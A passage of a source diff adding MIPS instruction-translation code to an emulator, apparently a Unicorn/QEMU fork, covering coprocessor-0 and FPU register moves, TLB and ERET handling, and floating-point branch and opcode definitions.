tcg_ctx->cpu_env, t0); + break; + case 6: + gen_helper_mttc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 7: + gen_helper_mttc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + gen_mtc0(ctx, t0, rd, sel); + break; + } + break; + case 10: + switch (sel) { + case 0: + gen_helper_mttc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + gen_mtc0(ctx, t0, rd, sel); + break; + } + case 12: + switch (sel) { + case 0: + gen_helper_mttc0_status(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + gen_mtc0(ctx, t0, rd, sel); + break; + } + case 13: + switch (sel) { + case 0: + gen_helper_mttc0_cause(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + goto die; + break; + } + break; + case 15: + switch (sel) { + case 1: + gen_helper_mttc0_ebase(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + goto die; + break; + } + break; + case 23: + switch (sel) { + case 0: + gen_helper_mttc0_debug(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + gen_mtc0(ctx, t0, rd, sel); + break; + } + break; + default: + gen_mtc0(ctx, t0, rd, sel); + } + } else switch (sel) { + /* GPR registers. */ + case 0: + gen_helper_0e1i(tcg_ctx, mttgpr, t0, rd); + break; + /* Auxiliary CPU registers */ + case 1: + switch (rd) { + case 0: + gen_helper_0e1i(tcg_ctx, mttlo, t0, 0); + break; + case 1: + gen_helper_0e1i(tcg_ctx, mtthi, t0, 0); + break; + case 2: + gen_helper_0e1i(tcg_ctx, mttacx, t0, 0); + break; + case 4: + gen_helper_0e1i(tcg_ctx, mttlo, t0, 1); + break; + case 5: + gen_helper_0e1i(tcg_ctx, mtthi, t0, 1); + break; + case 6: + gen_helper_0e1i(tcg_ctx, mttacx, t0, 1); + break; + case 8: + gen_helper_0e1i(tcg_ctx, mttlo, t0, 2); + break; + case 9: + gen_helper_0e1i(tcg_ctx, mtthi, t0, 2); + break; + case 10: + gen_helper_0e1i(tcg_ctx, mttacx, t0, 2); + break; + case 12: + gen_helper_0e1i(tcg_ctx, mttlo, t0, 3); + break; + case 13: + gen_helper_0e1i(tcg_ctx, mtthi, t0, 3); + break; + case 14: + gen_helper_0e1i(tcg_ctx, mttacx, t0, 3); + break; + case 16: + gen_helper_mttdsp(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + goto die; + } + break; + /* Floating point (COP1). */ + case 2: + /* XXX: For now we support only a single FPU context. */ + if (h == 0) { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32(ctx, fp0, rd); + tcg_temp_free_i32(tcg_ctx, fp0); + } else { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32h(ctx, fp0, rd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + break; + case 3: + /* XXX: For now we support only a single FPU context. */ + save_cpu_state(ctx, 1); + { + TCGv_i32 fs_tmp = tcg_const_i32(tcg_ctx, rd); + + gen_helper_0e2i(tcg_ctx, ctc1, t0, fs_tmp, rt); + tcg_temp_free_i32(tcg_ctx, fs_tmp); + } + /* Stop translation as we may have changed hflags */ + ctx->bstate = BS_STOP; + break; + /* COP2: Not implemented. */ + case 4: + case 5: + /* fall through */ + default: + goto die; + } + LOG_DISAS("mttr (reg %d u %d sel %d h %d)\n", rd, u, sel, h); + tcg_temp_free(tcg_ctx, t0); + return; + +die: + tcg_temp_free(tcg_ctx, t0); + LOG_DISAS("mttr (reg %d u %d sel %d h %d)\n", rd, u, sel, h); + generate_exception(ctx, EXCP_RI); +} + +static void gen_cp0 (CPUMIPSState *env, DisasContext *ctx, uint32_t opc, int rt, int rd) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "ldst"; + + check_cp0_enabled(ctx); + switch (opc) { + case OPC_MFC0: + if (rt == 0) { + /* Treat as NOP. */ + return; + } + gen_mfc0(ctx, *cpu_gpr[rt], rd, ctx->opcode & 0x7); + opn = "mfc0"; + break; + case OPC_MTC0: + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_mtc0(ctx, t0, rd, ctx->opcode & 0x7); + tcg_temp_free(tcg_ctx, t0); + } + opn = "mtc0"; + break; +#if defined(TARGET_MIPS64) + case OPC_DMFC0: + check_insn(ctx, ISA_MIPS3); + if (rt == 0) { + /* Treat as NOP. */ + return; + } + gen_dmfc0(ctx, *cpu_gpr[rt], rd, ctx->opcode & 0x7); + opn = "dmfc0"; + break; + case OPC_DMTC0: + check_insn(ctx, ISA_MIPS3); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_dmtc0(ctx, t0, rd, ctx->opcode & 0x7); + tcg_temp_free(tcg_ctx, t0); + } + opn = "dmtc0"; + break; +#endif + case OPC_MFTR: + check_insn(ctx, ASE_MT); + if (rd == 0) { + /* Treat as NOP. */ + return; + } + gen_mftr(env, ctx, rt, rd, (ctx->opcode >> 5) & 1, + ctx->opcode & 0x7, (ctx->opcode >> 4) & 1); + opn = "mftr"; + break; + case OPC_MTTR: + check_insn(ctx, ASE_MT); + gen_mttr(env, ctx, rd, rt, (ctx->opcode >> 5) & 1, + ctx->opcode & 0x7, (ctx->opcode >> 4) & 1); + opn = "mttr"; + break; + case OPC_TLBWI: + opn = "tlbwi"; + if (!env->tlb->helper_tlbwi) + goto die; + gen_helper_tlbwi(tcg_ctx, tcg_ctx->cpu_env); + break; + case OPC_TLBINV: + opn = "tlbinv"; + if (ctx->ie >= 2) { + if (!env->tlb->helper_tlbinv) { + goto die; + } + gen_helper_tlbinv(tcg_ctx, tcg_ctx->cpu_env); + } /* treat as nop if TLBINV not supported */ + break; + case OPC_TLBINVF: + opn = "tlbinvf"; + if (ctx->ie >= 2) { + if (!env->tlb->helper_tlbinvf) { + goto die; + } + gen_helper_tlbinvf(tcg_ctx, tcg_ctx->cpu_env); + } /* treat as nop if TLBINV not supported */ + break; + case OPC_TLBWR: + opn = "tlbwr"; + if (!env->tlb->helper_tlbwr) + goto die; + gen_helper_tlbwr(tcg_ctx, tcg_ctx->cpu_env); + break; + case OPC_TLBP: + opn = "tlbp"; + if (!env->tlb->helper_tlbp) + goto die; + gen_helper_tlbp(tcg_ctx, tcg_ctx->cpu_env); + break; + case OPC_TLBR: + opn = "tlbr"; + if (!env->tlb->helper_tlbr) + goto die; + gen_helper_tlbr(tcg_ctx, tcg_ctx->cpu_env); + break; + case OPC_ERET: + opn = "eret"; + check_insn(ctx, ISA_MIPS2); + if ((ctx->insn_flags & ISA_MIPS32R6) && + (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + goto die; + } + gen_helper_eret(tcg_ctx, tcg_ctx->cpu_env); + ctx->bstate = BS_EXCP; + break; + case OPC_DERET: + opn = "deret"; + check_insn(ctx, ISA_MIPS32); + if ((ctx->insn_flags & ISA_MIPS32R6) && + (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + goto die; + } + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + } else { + gen_helper_deret(tcg_ctx, tcg_ctx->cpu_env); + ctx->bstate = BS_EXCP; + } + break; + case OPC_WAIT: + opn = "wait"; + check_insn(ctx, ISA_MIPS3 | ISA_MIPS32); + if ((ctx->insn_flags & ISA_MIPS32R6) && + (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + goto die; + } + /* If we get an exception, we want to restart at next instruction */ + ctx->pc += 4; + save_cpu_state(ctx, 1); + ctx->pc -= 4; + gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env); + ctx->bstate = BS_EXCP; + break; + default: + die: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + return; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s %d", opn, regnames[rt], rd); +} +#endif /* !CONFIG_USER_ONLY */ + +/* CP1 Branches (before delay slot) */ +static void gen_compute_branch1(DisasContext *ctx, uint32_t op, + int32_t cc, int32_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + target_ulong btarget; + const char *opn = "cp1 cond branch"; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + + if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + generate_exception(ctx, EXCP_RI); + goto out; + } + + if (cc != 0) + check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); + + btarget = ctx->pc + 4 + offset; + + switch (op) { + case OPC_BC1F: + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_not_i32(tcg_ctx, t0, t0); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + opn = "bc1f"; + goto not_likely; + case OPC_BC1FL: + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_not_i32(tcg_ctx, t0, t0); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + opn = "bc1fl"; + goto likely; + case OPC_BC1T: + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + opn = "bc1t"; + goto not_likely; + case OPC_BC1TL: + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + opn = "bc1tl"; + likely: + ctx->hflags |= MIPS_HFLAG_BL; + break; + case OPC_BC1FANY2: + { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+1)); + tcg_gen_nand_i32(tcg_ctx, t0, t0, t1); + tcg_temp_free_i32(tcg_ctx, t1); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + } + opn = "bc1any2f"; + goto not_likely; + case OPC_BC1TANY2: + { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+1)); + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + tcg_temp_free_i32(tcg_ctx, t1); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + } + opn = "bc1any2t"; + goto not_likely; + case OPC_BC1FANY4: + { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+1)); + tcg_gen_and_i32(tcg_ctx, t0, t0, t1); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+2)); + tcg_gen_and_i32(tcg_ctx, t0, t0, t1); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+3)); + tcg_gen_nand_i32(tcg_ctx, t0, t0, t1); + tcg_temp_free_i32(tcg_ctx, t1); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + } + opn = "bc1any4f"; + goto not_likely; + case OPC_BC1TANY4: + { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+1)); + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+2)); + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+3)); + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + tcg_temp_free_i32(tcg_ctx, t1); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + } + opn = "bc1any4t"; + not_likely: + ctx->hflags |= MIPS_HFLAG_BC; + break; + default: + MIPS_INVAL(opn); + generate_exception (ctx, EXCP_RI); + goto out; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s: cond %02x target " TARGET_FMT_lx, opn, + ctx->hflags, btarget); + ctx->btarget = btarget; + ctx->hflags |= MIPS_HFLAG_BDS32; + out: + tcg_temp_free_i32(tcg_ctx, t0); +} + +/* R6 CP1 Branches */ +static void gen_compute_branch1_r6(DisasContext *ctx, uint32_t op, + int32_t ft, int32_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + target_ulong btarget; + const char *opn = "cp1 cond branch"; + TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); + + if (ctx->hflags & MIPS_HFLAG_BMASK) { +#ifdef MIPS_DEBUG_DISAS + LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx + "\n", ctx->pc); +#endif + generate_exception(ctx, EXCP_RI); + goto out; + } + + gen_load_fpr64(ctx, t0, ft); + tcg_gen_andi_i64(tcg_ctx, t0, t0, 1); + + btarget = addr_add(ctx, ctx->pc + 4, offset); + + switch (op) { + case OPC_BC1EQZ: + tcg_gen_xori_i64(tcg_ctx, t0, t0, 1); + opn = "bc1eqz"; + ctx->hflags |= MIPS_HFLAG_BC; + break; + case OPC_BC1NEZ: + /* t0 already set */ + opn = "bc1nez"; + ctx->hflags |= MIPS_HFLAG_BC; + break; + default: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + goto out; + } + + tcg_gen_trunc_i64_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s: cond %02x target " TARGET_FMT_lx, opn, + ctx->hflags, btarget); + ctx->btarget = btarget; + ctx->hflags |= MIPS_HFLAG_BDS32; + +out: + tcg_temp_free_i64(tcg_ctx, t0); +} + +/* Coprocessor 1 (FPU) */ + +#define FOP(func, fmt) (((fmt) << 21) | (func)) + +enum fopcode { + OPC_ADD_S = FOP(0, FMT_S), + OPC_SUB_S = FOP(1, FMT_S), + OPC_MUL_S = FOP(2, FMT_S), + OPC_DIV_S = FOP(3, FMT_S), + OPC_SQRT_S = FOP(4, FMT_S), + OPC_ABS_S = FOP(5, FMT_S), + OPC_MOV_S = FOP(6, FMT_S), + OPC_NEG_S = FOP(7, FMT_S), + OPC_ROUND_L_S = FOP(8, FMT_S), + OPC_TRUNC_L_S = FOP(9, FMT_S), + OPC_CEIL_L_S = FOP(10, FMT_S), + OPC_FLOOR_L_S = FOP(11, FMT_S), + OPC_ROUND_W_S = FOP(12, FMT_S), + OPC_TRUNC_W_S = FOP(13, FMT_S), + OPC_CEIL_W_S = FOP(14, FMT_S), + OPC_FLOOR_W_S = FOP(15, FMT_S), + OPC_SEL_S = FOP(16, FMT_S), + OPC_MOVCF_S = FOP(17, FMT_S), + OPC_MOVZ_S = FOP(18, FMT_S), + OPC_MOVN_S = FOP(19, FMT_S), + OPC_SELEQZ_S = FOP(20, FMT_S), + OPC_RECIP_S = FOP(21, FMT_S), + OPC_RSQRT_S = FOP(22, FMT_S), + OPC_SELNEZ_S = FOP(23, FMT_S), + OPC_MADDF_S = FOP(24, FMT_S), + OPC_MSUBF_S = FOP(25, FMT_S), + OPC_RINT_S = FOP(26, FMT_S), + OPC_CLASS_S = FOP(27, FMT_S), + OPC_MIN_S = FOP(28, FMT_S), + OPC_RECIP2_S = FOP(28, FMT_S), + OPC_MINA_S = FOP(29, FMT_S), + OPC_RECIP1_S = FOP(29, FMT_S), + OPC_MAX_S = FOP(30, FMT_S), + OPC_RSQRT1_S = FOP(30, FMT_S), + OPC_MAXA_S = FOP(31, FMT_S), + OPC_RSQRT2_S = FOP(31, FMT_S), + OPC_CVT_D_S = FOP(33, FMT_S), + OPC_CVT_W_S = FOP(36, FMT_S), + OPC_CVT_L_S = FOP(37, FMT_S), + OPC_CVT_PS_S = FOP(38, FMT_S), + OPC_CMP_F_S = FOP (48, FMT_S), + OPC_CMP_UN_S = FOP (49, FMT_S), + OPC_CMP_EQ_S = FOP (50, FMT_S), + OPC_CMP_UEQ_S = FOP (51, FMT_S), + OPC_CMP_OLT_S = FOP (52, FMT_S), + OPC_CMP_ULT_S = FOP (53, FMT_S), + OPC_CMP_OLE_S = FOP (54, FMT_S), + OPC_CMP_ULE_S = FOP (55, FMT_S), + OPC_CMP_SF_S = FOP (56, FMT_S), + OPC_CMP_NGLE_S = FOP (57, FMT_S), + OPC_CMP_SEQ_S = FOP (58, FMT_S), + OPC_CMP_NGL_S = FOP (59, FMT_S), + OPC_CMP_LT_S = FOP (60, FMT_S), + OPC_CMP_NGE_S = FOP (61, FMT_S), + OPC_CMP_LE_S = FOP (62, FMT_S), + OPC_CMP_NGT_S = FOP (63, FMT_S), + + OPC_ADD_D = FOP(0, FMT_D), + OPC_SUB_D = FOP(1, FMT_D), + OPC_MUL_D = FOP(2, FMT_D), + OPC_DIV_D = FOP(3, FMT_D), + OPC_SQRT_D = FOP(4, FMT_D), + OPC_ABS_D = FOP(5, FMT_D), + OPC_MOV_D = FOP(6, FMT_D), + OPC_NEG_D = FOP(7, FMT_D), + OPC_ROUND_L_D = FOP(8, FMT_D), + OPC_TRUNC_L_D = FOP(9, FMT_D), + OPC_CEIL_L_D = FOP(10, FMT_D), + OPC_FLOOR_L_D = FOP(11, FMT_D), + OPC_ROUND_W_D = FOP(12, FMT_D), + OPC_TRUNC_W_D = FOP(13, FMT_D), + OPC_CEIL_W_D = FOP(14, FMT_D), + OPC_FLOOR_W_D = FOP(15, FMT_D), + OPC_SEL_D = FOP(16, FMT_D), + OPC_MOVCF_D = FOP(17, FMT_D), + OPC_MOVZ_D = FOP(18, FMT_D), + OPC_MOVN_D = FOP(19, FMT_D), + OPC_SELEQZ_D = FOP(20, FMT_D), + OPC_RECIP_D = FOP(21, FMT_D), + OPC_RSQRT_D = FOP(22, FMT_D), + OPC_SELNEZ_D = FOP(23, FMT_D), + OPC_MADDF_D = FOP(24, FMT_D), + OPC_MSUBF_D = FOP(25, FMT_D), + OPC_RINT_D = FOP(26, FMT_D), + OPC_CLASS_D = FOP(27, FMT_D), + OPC_MIN_D = FOP(28, FMT_D), + OPC_RECIP2_D = FOP(28, FMT_D), + OPC_MINA_D = FOP(29, FMT_D), + OPC_RECIP1_D = FOP(29, FMT_D), + OPC_MAX_D = FOP(30, FMT_D), + OPC_RSQRT1_D = FOP(30, FMT_D), + OPC_MAXA_D = FOP(31, FMT_D), + OPC_RSQRT2_D = FOP(31, FMT_D), + OPC_CVT_S_D = FOP(32, FMT_D), + OPC_CVT_W_D = FOP(36, FMT_D), + OPC_CVT_L_D = FOP(37, FMT_D), + OPC_CMP_F_D = FOP (48, FMT_D), + OPC_CMP_UN_D = FOP (49, FMT_D), + OPC_CMP_EQ_D = FOP (50, FMT_D), + OPC_CMP_UEQ_D = FOP (51, FMT_D), + OPC_CMP_OLT_D = FOP (52, FMT_D), + OPC_CMP_ULT_D = FOP (53, FMT_D), + OPC_CMP_OLE_D = FOP (54, FMT_D), + OPC_CMP_ULE_D = FOP (55, FMT_D), + OPC_CMP_SF_D = FOP (56, FMT_D), + OPC_CMP_NGLE_D = FOP (57, FMT_D), + OPC_CMP_SEQ_D = FOP (58, FMT_D), + OPC_CMP_NGL_D = FOP (59, FMT_D), + OPC_CMP_LT_D = FOP (60, FMT_D), + OPC_CMP_NGE_D = FOP (61, FMT_D), + OPC_CMP_LE_D = FOP (62, FMT_D), + OPC_CMP_NGT_D = FOP (63, FMT_D), + + OPC_CVT_S_W = FOP(32, FMT_W), + OPC_CVT_D_W = FOP(33, FMT_W), + OPC_CVT_S_L = FOP(32, FMT_L), + OPC_CVT_D_L = FOP(33, FMT_L), + OPC_CVT_PS_PW = FOP(38, FMT_W), + + OPC_ADD_PS = FOP(0, FMT_PS), + OPC_SUB_PS = FOP(1, FMT_PS), + OPC_MUL_PS = FOP(2, FMT_PS), + OPC_DIV_PS = FOP(3, FMT_PS), + OPC_ABS_PS = FOP(5, FMT_PS), + OPC_MOV_PS = FOP(6, FMT_PS), + OPC_NEG_PS = FOP(7, FMT_PS), + OPC_MOVCF_PS = FOP(17, FMT_PS), + OPC_MOVZ_PS = FOP(18, FMT_PS), + OPC_MOVN_PS = FOP(19, FMT_PS), + OPC_ADDR_PS = FOP(24, FMT_PS), + OPC_MULR_PS = FOP(26, FMT_PS), + OPC_RECIP2_PS = FOP(28, FMT_PS), + OPC_RECIP1_PS = FOP(29, FMT_PS), + OPC_RSQRT1_PS = FOP(30, FMT_PS), + OPC_RSQRT2_PS = FOP(31, FMT_PS), + + OPC_CVT_S_PU = FOP(32, FMT_PS), + OPC_CVT_PW_PS = FOP(36, FMT_PS), + OPC_CVT_S_PL = FOP(40, FMT_PS), + OPC_PLL_PS = FOP(44, FMT_PS), + OPC_PLU_PS = FOP(45, FMT_PS), + OPC_PUL_PS = FOP(46, FMT_PS), + OPC_PUU_PS = FOP(47, FMT_PS), + OPC_CMP_F_PS = FOP (48, FMT_PS), + OPC_CMP_UN_PS = FOP (49, FMT_PS), + OPC_CMP_EQ_PS = FOP (50, FMT_PS), + OPC_CMP_UEQ_PS = FOP (51, FMT_PS), + OPC_CMP_OLT_PS = FOP (52, FMT_PS), + OPC_CMP_ULT_PS = FOP (53, FMT_PS), + OPC_CMP_OLE_PS = FOP (54, FMT_PS), + OPC_CMP_ULE_PS = FOP (55, FMT_PS), + OPC_CMP_SF_PS = FOP (56, FMT_PS), + OPC_CMP_NGLE_PS = FOP (57, FMT_PS), + OPC_CMP_SEQ_PS = FOP (58, FMT_PS), + OPC_CMP_NGL_PS = FOP (59, FMT_PS), + OPC_CMP_LT_PS = FOP (60, FMT_PS), + OPC_CMP_NGE_PS = FOP (61, FMT_PS), + OPC_CMP_LE_PS = FOP (62, FMT_PS), + OPC_CMP_NGT_PS = FOP (63, FMT_PS), +}; + +enum r6_f_cmp_op { + R6_OPC_CMP_AF_S = FOP(0, FMT_W), + R6_OPC_CMP_UN_S = FOP(1, FMT_W), + R6_OPC_CMP_EQ_S = FOP(2, FMT_W), + R6_OPC_CMP_UEQ_S = FOP(3, FMT_W), + R6_OPC_CMP_LT_S = FOP(4, FMT_W), + R6_OPC_CMP_ULT_S = FOP(5, FMT_W), + R6_OPC_CMP_LE_S = FOP(6, FMT_W), + R6_OPC_CMP_ULE_S = FOP(7, FMT_W), + R6_OPC_CMP_SAF_S = FOP(8, FMT_W), + R6_OPC_CMP_SUN_S = FOP(9, FMT_W), + R6_OPC_CMP_SEQ_S = FOP(10, FMT_W), + R6_OPC_CMP_SEUQ_S = FOP(11, FMT_W), + R6_OPC_CMP_SLT_S = FOP(12, FMT_W), + R6_OPC_CMP_SULT_S = FOP(13, FMT_W), + R6_OPC_CMP_SLE_S = FOP(14, FMT_W), + R6_OPC_CMP_SULE_S = FOP(15, FMT_W), + R6_OPC_CMP_OR_S = FOP(17, FMT_W), + R6_OPC_CMP_UNE_S = FOP(18, FMT_W), + R6_OPC_CMP_NE_S = FOP(19, FMT_W), + R6_OPC_CMP_SOR_S = FOP(25, FMT_W), + R6_OPC_CMP_SUNE_S = FOP(26, FMT_W), + R6_OPC_CMP_SNE_S = FOP(27, FMT_W), + + R6_OPC_CMP_AF_D = FOP(0, FMT_L), + R6_OPC_CMP_UN_D = FOP(1, FMT_L), + R6_OPC_CMP_EQ_D = FOP(2, FMT_L), + R6_OPC_CMP_UEQ_D = FOP(3, FMT_L), + R6_OPC_CMP_LT_D = FOP(4, FMT_L), + R6_OPC_CMP_ULT_D = FOP(5, FMT_L), + R6_OPC_CMP_LE_D = FOP(6, FMT_L), + R6_OPC_CMP_ULE_D = FOP(7, FMT_L), + R6_OPC_CMP_SAF_D = FOP(8, FMT_L), + R6_OPC_CMP_SUN_D = FOP(9, FMT_L), + R6_OPC_CMP_SEQ_D = FOP(10, FMT_L), + R6_OPC_CMP_SEUQ_D = FOP(11, FMT_L), + R6_OPC_CMP_SLT_D = FOP(12, FMT_L), + R6_OPC_CMP_SULT_D = FOP(13, FMT_L), + R6_OPC_CMP_SLE_D = FOP(14, FMT_L), + R6_OPC_CMP_SULE_D = FOP(15, FMT_L), + R6_OPC_CMP_OR_D = FOP(17, FMT_L), + R6_OPC_CMP_UNE_D = FOP(18, FMT_L), + R6_OPC_CMP_NE_D = FOP(19, FMT_L), + R6_OPC_CMP_SOR_D = FOP(25, FMT_L), + R6_OPC_CMP_SUNE_D = FOP(26, FMT_L), + R6_OPC_CMP_SNE_D = FOP(27, FMT_L), +}; +static void gen_cp1 (DisasContext *ctx, uint32_t opc, int rt, int fs) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "cp1 move"; + TCGv t0 = tcg_temp_new(tcg_ctx); + + switch (opc) { + case OPC_MFC1: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); + tcg_temp_free_i32(tcg_ctx, fp0); + } + gen_store_gpr(tcg_ctx, t0, rt); + opn = "mfc1"; + break; + case OPC_MTC1: + gen_load_gpr(ctx, t0, rt); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32(ctx, fp0, fs); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "mtc1"; + break; + case OPC_CFC1: + gen_helper_1e0i(tcg_ctx, cfc1, t0, fs); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "cfc1"; + break; + case OPC_CTC1: + gen_load_gpr(ctx, t0, rt); + save_cpu_state(ctx, 1); + { + TCGv_i32 fs_tmp = tcg_const_i32(tcg_ctx, fs); + + gen_helper_0e2i(tcg_ctx, ctc1, t0, fs_tmp, rt); + tcg_temp_free_i32(tcg_ctx, fs_tmp); + } + /* Stop translation as we may have changed hflags */ + ctx->bstate = BS_STOP; + opn = "ctc1"; + break; +#if defined(TARGET_MIPS64) + case OPC_DMFC1: + gen_load_fpr64(ctx, t0, fs); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "dmfc1"; + break; + case OPC_DMTC1: + gen_load_gpr(ctx, t0, rt); + gen_store_fpr64(ctx, t0, fs); + opn = "dmtc1"; + break; +#endif + case OPC_MFHC1: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, fs); + tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); + tcg_temp_free_i32(tcg_ctx, fp0); + } + gen_store_gpr(tcg_ctx, t0, rt); + opn = "mfhc1"; + break; + case OPC_MTHC1: + gen_load_gpr(ctx, t0, rt); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32h(ctx, fp0, fs); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "mthc1"; + break; + default: + MIPS_INVAL(opn); + generate_exception (ctx, EXCP_RI); + goto out; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s %s", opn, regnames[rt], fregnames[fs]); + + out: + tcg_temp_free(tcg_ctx, t0); +} + +static void gen_movci (DisasContext *ctx, int rd, int rs, int cc, int tf) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int l1; + TCGCond cond; + TCGv_i32 t0; + + if (rd == 0) { + /* Treat as NOP. */ + return; + } + + if (tf) + cond = TCG_COND_EQ; + else + cond = TCG_COND_NE; + + l1 = gen_new_label(tcg_ctx); + t0 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); + tcg_temp_free_i32(tcg_ctx, t0); + if (rs == 0) { + 